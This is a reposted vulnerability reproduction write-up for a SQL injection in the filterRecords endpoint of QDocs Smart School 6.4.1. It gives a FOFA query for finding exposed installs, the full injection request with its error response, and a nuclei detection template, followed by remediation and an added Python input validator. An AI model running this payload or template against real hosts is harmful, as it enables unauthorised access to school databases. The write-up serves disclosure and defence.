QDocs Smart School SQL Injection Vulnerability Reproduction (with nuclei PoC)

admin, 2024-02-10 20:39:33

01

Vulnerability Name

QDocs Smart School SQL Injection Vulnerability

02

Affected Versions

Smart School 6.4.1


03

Vulnerability Description

QDocs Smart School is a smart campus management system. The filterRecords endpoint of Smart School 6.4.1 contains a SQL injection vulnerability: an attacker can read sensitive data from the database and may even execute commands, which could lead to remote control of the host.

04

FOFA Search Query
body="close closebtnmodal"


05

Vulnerability Reproduction

The PoC is as follows; it makes the database compute the MD5 of 123456:

POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

The response is as follows:

HTTP/1.1 500 Internal Server Error
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 14 Nov 2023 02:21:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: ci_session=0fbd043af961fa6feb7ba1a8b5c5a3b2c0cff392; expires=Tue, 14-Nov-2023 04:21:35 GMT; Max-Age=7200; path=/; HttpOnly
Upgrade: h2,h2c
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Database Error</title>
<style type="text/css">
::selection { background-color: #E13300; color: white; }
::-moz-selection { background-color: #E13300; color: white; }
body { background-color: #fff; margin: 40px; font: 13px/20px normal Helvetica, Arial, sans-serif; color: #4F5155; }
a { color: #003399; background-color: transparent; font-weight: normal; }
h1 { color: #444; background-color: transparent; border-bottom: 1px solid #D0D0D0; font-size: 19px; font-weight: normal; margin: 0 0 14px 0; padding: 14px 15px 10px 15px; }
code { font-family: Consolas, Monaco, Courier New, Courier, monospace; font-size: 12px; background-color: #f9f9f9; border: 1px solid #D0D0D0; color: #002166; display: block; margin: 14px 0 14px 0; padding: 12px 10px 12px 10px; }
#container { margin: 10px; border: 1px solid #D0D0D0; box-shadow: 0 0 8px #D0D0D0; }
p { margin: 12px 15px 12px 15px; }
</style>
</head>
<body>
<div id="container">
<h1>A Database Error Occurred</h1>
<p>Error Number: 1105</p>
<p>XPATH syntax error: '^e10adc3949ba59abbe56e057f20f883'</p>
<p>SELECT `online_courses`.*, `course_category`.`category_name` FROM `online_courses` LEFT JOIN `course_category` ON `course_category`.`id` = `online_courses`.`category_id` WHERE 1 = 1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))# '1' AND `online_courses`.`front_side_visibility` = 'yes' AND `online_courses`.`status` = 1</p>
<p>Filename: models/Course_model.php</p>
<p>Line Number: 708</p>
</div>
</body>
</html>

This confirms the vulnerability. The error message carries the MD5 of 123456 (e10adc3949ba59abbe56e057f20f883e) without its last character, because MySQL limits the text of an extractvalue() error to 32 characters and one of them is the leading '^'; that is why the nuclei matcher below checks the 31-character prefix.

06

nuclei PoC

The PoC file contents are as follows:

id: smart-school-filterRecords-sqli

info:
  name: QDocs Smart School SQL注入漏洞
  author: fgz
  severity: high
  description: 'QDocs Smart School是一套智慧校园管理系统。Smart School 6.4.1系统filterRecords接口存在sql注入漏洞,攻击者可获取数据库敏感数据,甚至执行命令,进而有可能导致主机被远控。'
  tags: 2023,smart-school,sqli
  metadata:
    max-request: 3
    fofa-query: body="close closebtnmodal"
    verified: true

http:
  - method: POST
    path:
      - "{{BaseURL}}/course/filterRecords/"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1"
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 500 && contains(body,'e10adc3949ba59abbe56e057f20f883')"

Run the PoC:

nuclei.exe -t mypoc/其他/smart-school-filterRecords-sqli.yaml -u http://192.168.86.128:8990


07

Remediation

Upgrade to the latest version.
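Beyond upgrading, the database error above shows that the searchfield value is interpolated unquoted into the WHERE clause, so it should only ever be a column name drawn from an allowlist. The following is an added Python example, not code from the page or from Smart School, that checks each searchdata[n][searchfield] value of a /course/filterRecords/ POST body against a bare-identifier pattern (the regex stands in for the application's real column allowlist, which is an assumption) and recognises the verbose database error page that the error-based PoC depends on.

```python
# Added defensive example (not from the page or from Smart School's code): validate the
# searchdata[n][searchfield] values of a /course/filterRecords/ POST body and detect the
# verbose database error page that makes the error-based technique observable.
import re
from urllib.parse import parse_qs

# A legitimate searchfield is a column name. The real fix is a fixed allowlist of column
# names; a bare SQL identifier pattern is assumed here in its place.
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
FIELD_KEY_RE = re.compile(r"^searchdata\[\d+\]\[searchfield\]$")


def bad_searchfields(body: str) -> list:
    """Return (key, value) pairs whose searchfield value is not a bare identifier."""
    hits = []
    for key, values in parse_qs(body, keep_blank_values=True).items():
        if FIELD_KEY_RE.match(key):
            hits.extend((key, v) for v in values if not IDENT_RE.match(v))
    return hits


def is_filterrecords_injection(method: str, path: str, body: str) -> bool:
    """True when a filterRecords POST carries a non-identifier searchfield (block or alert)."""
    return (method.upper() == "POST"
            and path.rstrip("/") == "/course/filterRecords"
            and bool(bad_searchfields(body)))


def leaks_db_error(status: int, resp_body: str) -> bool:
    """True when the app answers with its verbose database error page (status 500 plus the
    page title seen above); that page should never reach clients in production."""
    return status == 500 and "A Database Error Occurred" in resp_body


# Constructed sample inputs: the PoC body from the page and a benign filter request.
POC_BODY = ("searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1"
            "&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,"
            "concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1")
BENIGN_BODY = ("searchdata[0][title]=Category&searchdata[0][searchfield]=category_id"
               "&searchdata[0][searchvalue]=3")

if __name__ == "__main__":
    print(bad_searchfields(POC_BODY))
    print(is_filterrecords_injection("POST", "/course/filterRecords/", BENIGN_BODY))
```

Note that the PoC's first searchfield value, a bare 1, is also rejected by the identifier pattern; a production allowlist of real column names makes that decision explicit.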

Originally published on the WeChat public account AI与网安: QDocs Smart School SQL Injection Vulnerability Reproduction (with nuclei PoC)

Published by admin on 2024-02-10 20:39:33. Reposts should keep the original link (CN-SEC中文网, with thanks to the original author): http://cn-sec.com/archives/2209928.html
